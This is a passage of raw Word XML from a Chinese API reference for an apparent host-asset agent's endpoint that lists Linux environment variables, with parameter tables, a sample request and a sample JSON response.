            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037300AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DEDEA20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3BC270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F1E8D61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1EACD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D8ABCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444414E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E24FDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="701A4E18" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12228FA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52ED6968" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F1AB05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3AE2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CD3AA5E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C32E734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DC92BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F5C56F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A40152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="648DD8F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F3B8A21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2ECD63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108A07B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A55B1AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23CC884B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C87E01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1696A7C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CAF7F12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AAA017" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AD8D935" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78957B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sysEnv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A98722" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B1E49E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9C3CE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C11B30D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EC9AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/env/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B9E0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB5F84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "key": "BASH_CMDS",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "value": "()",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "weblogic",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sysEnv": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C4263"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1BC053E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D2BBE7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323771E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1418FF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E075E7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EF1E746" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C606A43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D96AE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04E6DC3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279BCC1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74D5649D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41423C80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2517CCB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D14AC79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D294F56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06B877F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3981DB17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45BEC52A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="429EC4DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF2F546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BB6E676" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DDF0A08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2090C3CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB462B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3BFF1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CA5958D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B3F80F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D404452" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0589D4B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B1F235" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01E9147D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676701D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75BE50BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212C9FB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F7A105" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67D4B6AE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C3A074" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CEF5FF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2640EE02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F77874" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="047A57F6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6671286B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2890B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1543F839" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B966A56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="696163C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648D2F70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1761C8F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D664C39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7886E08C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35342B56" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583CB78E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5AB7A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F434453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A0FDC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67A1F596" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D6F41A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
